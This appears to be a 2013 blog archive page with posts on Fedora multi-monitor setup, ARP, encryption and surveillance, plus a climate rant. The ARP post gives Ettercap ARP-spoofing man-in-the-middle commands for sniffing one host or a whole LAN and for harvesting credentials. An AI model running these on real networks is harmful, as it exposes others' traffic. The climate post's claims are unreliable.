Monday, September 30, 2013

Fedora Linux with Multiple Monitors

Quite annoyingly, a default install of Fedora with XFCE on a laptop computer doesn't support multiple monitors properly.  If you plug an external screen in, the only option is to mirror the main screen (using the function keys, fn-F3 or some such), which is seldom what I want.  I prefer having a bigger desktop stretched over both screens.  Even though the two may not have the same resolution, I think that it is a better use of pixels.

Old Fashioned Setup

Sometimes the prehistorical command line works best.  The two screens can be configured with xrandr, but one has to remember to rerun xrandr before the external screen is unplugged, to exclude it (turn it off).  It can be made more convenient by hooking two scripts to a pair of hot keys, which would bring your laptop machine back into this century.

First you need to do some sleuthing.  Simply run xrandr with no parameters:

$ xrandr
Screen 0: minimum 320 x 200, current 1366 x 1536, maximum 8192 x 8192
VGA-0 connected 1024x768+0+768 (normal left inverted right x axis y axis) 304mm x 228mm
   1024x768       74.9*    75.1     70.1     71.8     60.0  
   832x624        74.6  
   640x480        72.8     75.0     66.7     60.0  
   640x400        70.1  
LVDS-0 connected 1366x768+0+0 (normal left inverted right x axis y axis) 344mm x 193mm
   1366x768       60.0*+
   1152x768       59.8  
   1024x768       59.9  
   720x480        59.7  
   640x480        59.4
From this output, you can see that the displays are named LVDS-0 (laptop) at 1366x768 and VGA-0 (monitor) at 1024x768.

Configure the monitor VGA-0, to the right of the laptop screen LVDS-0:
$ xrandr --output VGA-0 --auto --right-of LVDS-0

To disable the external screen before unplugging it:
$ xrandr --output VGA-0 --off
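
The two hot-key scripts suggested above can be a single toggle that also cleans up after a screen that was unplugged while still enabled. This is an added example, not from the original post: the function name plan_xrandr and the "apply" argument are made up here, and LVDS-0 is assumed to be the laptop panel, as in the sample output.

```shell
#!/bin/bash
# Added example: one hot-key script instead of two. It reads `xrandr` output
# and decides whether to extend onto, or switch off, the external screen.
INTERNAL="${INTERNAL:-LVDS-0}"   # assumption: panel name from the output above

# Read `xrandr` output on stdin, print the command to run (nothing if no-op).
plan_xrandr() {
    awk -v internal="$INTERNAL" '
        # Header lines: "VGA-0 connected 1024x768+0+768 (normal left ..."
        # An enabled output carries a WxH+X+Y geometry; a disabled one does not.
        { enabled = ($0 ~ /[0-9]+x[0-9]+[+][0-9]+[+][0-9]+/) }
        $1 != internal && $2 == "connected"               { ext = $1; on = enabled }
        # Unplugged without being turned off first: still enabled, must go.
        $1 != internal && $2 == "disconnected" && enabled { stale = $1 }
        END {
            if (stale != "")
                print "xrandr --output " stale " --off"
            else if (ext != "")
                print "xrandr --output " ext " " (on ? "--off" : "--auto --right-of " internal)
        }'
}

# Bind "<this script> apply" to a hot key; without the argument nothing runs.
if [ "${1:-}" = "apply" ]; then
    cmd=$(xrandr | plan_xrandr)
    if [ -n "$cmd" ]; then $cmd; fi
fi
```

If more than one external output is connected, the last one listed by xrandr is the one toggled.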

Graphical Setup

Alternatively, use the graphical utility arandr:
# yum install arandr

Run that utility and click-drag-drop the screens where you want them!

Obstreperous Hardware

Sometimes you encounter weird hardware that hangs the system when it is probed.  In these cases you need to create an Xorg.conf file and configure things manually.  See this link

'Hope that helps!

Saturday, September 28, 2013


The Church of Global Warming alarmists are getting really desperate.  They are now claiming with 95% certainty that human produced CO2 is causing catastrophic global warming and that it must be stopped at all costs, otherwise the sky will fall on our heads tomorrow.  Humanity needs to extinguish all organic power stations and go back to shivering in caves to prevent further warming...

Warming, What Warming?

Unfortunately for the alarmists, reality just flat out refuses to play ball and back them up.  For the past 15 years, despite us having emitted massively more organic gasses than ever before, the earth simply refused to warm up.  How many more years of contradicting data will it take to make the Church of Global Warming prophets admit that their computer models are maybe just a wee little bit off kilter?  Could it be that there are lots of green things out there that love to breathe CO2?

Global Cooling

Anyone over 50 is old enough to remember their predecessor, the Church of Global Cooling of the 1970s.  Their prophecies didn't come true either and amusingly, some of the prophets of the modern church were in the older one - professional firebrand preachers: Repent, repent, the end is nigh...

Moreover, global warming is a good thing.  More warming will open up the northern tundra to farming. Russia and Canada will benefit and in the extreme, even Antarctica may be livable one day. Global cooling however, can be a real show stopper - freezing over the northern areas will cause famine and starvation on a massive scale.

Fire In The Hole!

All I can say is that some 20,000 years ago, those cave men must have lit enormous bonfires in their caves to bring an end to the last ice age, so going back to living in caves may not do it...

Sunday, September 22, 2013

ARP, the mystery protocol that makes a LAN work

Address Resolution Protocol

Usually, ARP just works and most people are blissfully unaware of it, but once in a while, I run into a problem.

ARP is the mystery protocol that makes a LAN work.  When a host wants to talk to another host on a LAN, it sends out a Who Has w.x.y.z message and gets an I Am reply. After that the systems know how to talk to each other using their MAC addresses and the LAN switch knows how to route the packets between the two hosts.

Fail Over of Servers

This is all very nice when you are running an ordinary LAN, but the wheels tend to fall off when you run a system with redundancy and fail over.

What happens in a fail over case, is that some devices will remember the old connection and will refuse to talk to the backup host, because while the backup host has the same IP address as the now defunct host, its MAC address is different. The entries in the ARP table can take a very long time to time out, more than 8 minutes in most Linux systems.

The solution is to force an ARP table update in hosts on the LAN, using the arping command:
$ arping -A -c 1 -I em0

The above example will send an unsolicited I Am reply to devices on the LAN. Read man arping for more details. (Some devices will respond to a request and some to an answer, so the best strategy is to send both to each device that you need to update, using -U for one command and -A for the other.)

You can verify what is happening using tcpdump:
# tcpdump -lni em0 arp 

This is known as a gratuitous or unsolicited ARP to update a neighbour's cache.


Another problem arises when a backup system causes a LAN loop. 

Broadcast ARP messages will get stuck in the loop and will clog up the LAN after a little while. The spanning tree protocol was devised to control Ethernet switches and prevent loops, but in my experience it never works the way I want, so the best solution is to avoid making loops in the first place, rather than try to fix it using spanning tree.

ARP Poisoning

One of the myths surrounding a switched environment is that it prevents packet sniffing. It only makes it a little more awkward. Anyone can put their network card into promiscuous mode and capture packets between other hosts, by using ARP Spoofing. All you need is Ettercap.

ARP Cache

ARP is the Address Resolution Protocol. It is used to translate IP Addresses to MAC Addresses (Physical Address). A computer sends a query out to its broadcast domain asking who has a certain IP address. When the device at the IP address receives the packet it replies with its MAC Address and the requesting computer will log the response in its ARP cache. 

The ARP cache can be viewed by typing arp -a from the command-line:
Interface: --- 0x5
  Internet Address      Physical Address      Type
                        00-0b-cd-ef-2c-ff     dynamic
                        00-0e-7f-ef-b5-8d     dynamic

ARP Spoofing

ARP spoofing works by an attacker PC sending fake ARP responses to victim PCs, stating that it is someone else; each victim PC then updates its ARP cache and directs traffic to the attacker. The attacker will log, read, or modify the packets and then forward them to the destination.

This can be done using arping as discussed above, or one can use Ettercap. Ettercap provides a GUI which can be launched from the command-line using ettercap -G, or it can be run from the command-line entirely.

Basic Sniffing

To watch traffic passing by on the network use:
# ettercap -Tzq -i eth0

This will put ettercap into text mode, it will not ARP scan the network and will be quiet. Only interesting traffic will be displayed as it passes and it will listen on interface eth0 (or em1 or wlan0... use ifconfig to see what is available).

Man In The Middle Attack 

To sniff traffic between 2 hosts the attacker can run the following command from his Linux work station:
# ettercap -i eth0 -T -M arp /victim_ip_A/ /victim_ip_B/

The -i switch is telling ettercap to use a specific interface, in this case eth0, the -T switch is telling ettercap to use the Text interface and the -M switch is telling ettercap to use the Man-in-Middle-Mode (MITM).

Sniffing Multiple Hosts 

Multiple hosts can be sniffed with a command such as:
# ettercap -i eth0 -T -M arp / / /

If only traffic to a certain port, such as Telnet, needs to be captured, the command would look like:
# ettercap -i eth0 -T -M arp / / /

Sniffing All Hosts

To sniff traffic between all hosts on a small network:
# ettercap -T -M arp // //

Depending on the size of the network, this may cause dropped packets and performance issues and an angry IT person may eventually sneak up and hit you with an ugly stick.


  • Sniffing HTTPS
  • Collecting usernames and passwords
  • Injecting traffic
  • OS fingerprinting

Logging The Output

 To log the output of Ettercap you can use the following:
  • -L This will log both the packet detail (filename.ecp) and the info (filename.eci)
  • -l This will log only info (filename.eci)
  • -w Write output to a pcap file (viewable with Wireshark)

The syntax to log the output would be:
# ettercap -T -L filename -qM arp /ip_address_A/ /ip_address_B/

Other useful options:
  • -P use plugin (to view plugins, run ettercap -TQ and press p to view the plugin menu)
  • -c Compress the output (gzip)

Viewing The Output

The output from ettercap is a standard pcap file and can be viewed using etterlog, tcpdump, wireshark, or sent directly to the screen.

Using Ettercap for Fun and Profit

Ettercap can be used to perform MITM attacks and capture traffic between 2 hosts, just like the good folks at the NSA and GCHQ like to do.

Obviously this traffic can be parsed for useful information using grep.

You could run dsniff on the same PC and LAN card to run the traffic through that.

You could run driftnet to view any pictures that are passing the interface, or you could send the visited URLs to your browser to see what other LAN users are doing and pretty soon, you will feel like a veritable Eddy Snowden.


Note that the ettercap syntax differs slightly from version to version.

To MITM someone you may need either:
# ettercap -i eth0 -T -M arp /victim_ip_A/ /victim_ip_B/
# ettercap -i eth0 -T -M arp /victim_ip_A/port/ /victim_ip_B/port/

or to MITM everybody:
# ettercap -i eth0 -T -M arp // //
# ettercap -i eth0 -T -M arp /// ///

Thanks to Mohammad Aamir, who spotted a mistake.

Have fun!


Monday, September 9, 2013

Negative Disclosure

Some security related web sites have started to proclaim that they have had '0 Police Information Requests', or something to that effect.  This is intended as a 'dead man's switch'.  When they do get a police information request, they intend to remove that statement, not update it to 1.

This won't work.  When they get a subpoena with an accompanying gag order and remove that statement, they can probably be charged with obstruction of justice and contempt of court and likely a few other things as well, so those statements will never be removed.

If you were wondering, I haven't gotten any information requests either - anyone can simply get the information from Google and doesn't have to ask me!

Friday, September 6, 2013


The Analytical Engine

Whenever I glance at my site statistics, the USA is at the top of the list - no surprise there, but the second entry is always Ukraine.  Uhmmm, what, why Ukraine?

Is Google Analytics really so incredibly bad, or is the FSB based in Ukraine maybe?

More likely someone in Ukraine just loves my ramblings and sits and clicks the refresh button all day...

Take Back the Intertubes

Bruce Schneier wrote a column on taking back the internet

I just like that picture of Senator Hatch's Intertubes...

Throwing an Elliptic Curve Ball

Defeatist Attitudes

The hullabaloo around the pervasive NSA and GCHQ snooping is still ongoing.  Nevertheless, the common public is indifferent, since they don't understand it and feel that they cannot do anything about it anyway - defeatism at its worst.

Computer security is an asymmetric battle.  The little guy is up against Goliath, with only some obscure mathematics to safeguard him. The sad fact of the matter is that we were never supposed to have to take on the likes of the NSA and GCHQ.  They were supposed to be the good guys, but their overreach has moved them over to the Dark Side.

Leaky Sieves

The problem is that the NSA and GCHQ are leaky sieves.  They gather tons of data and then leak it out to all and sundry - after all, what is the point of gathering data if nobody will ever look at it?  Therefore the only way to secure your data is to ensure that they can never get their grubby paws on  it in the first place.

The computer geeks of the world have a heavy burden to shoulder, trying to keep company business transactions secure, installing and deploying encryption systems despite general apathy and the constant nagging feeling that it is all for naught - that you are forced to go to a lot of trouble to install a complex encryption system that has already been broken without your knowledge.

Elliptic Curve and Diffie Hellman to the Rescue

At this point, after reading numerous  articles, my advice is to switch to Elliptic Curve Encryption with the Diffie Hellman Key Exchange, despite Bruce Schneier's reservations about the NSA involvement in the selection of the constants (Much as I dislike their current overreach, the NSA isn't all bad, just don't use Dual_EC_DRBG from NIST SP 800-90, which was discredited by very good Microsoft cryptographers. :).

Look for the keyword ECDHE when you select and install off the shelf VPN equipment or software.  Make the keys as long as you can tolerate (larger than 500 bits) and put your trust in forward secrecy, so that if one session gets compromised, it doesn't automatically spill all the beans in your NSA archive. That seems to be about the best you can do.

You should use standards and devices that are designed to be interoperable, for example Suite B described on this page: and the one I prefer would be this, which is Elliptic Curve  key agreement with a Discrete Logarithm algorithm and a Diffie Hellman handshake.

Interoperable equipment ensures that the implementation was reviewed by multiple parties.  Do not trust proprietary algorithms from a single source, since they could be snake oil.

Sometimes I get tempted to add a large block of /dev/urandom data to the end of every email, just to give the spooks grief...

Good Luck With This
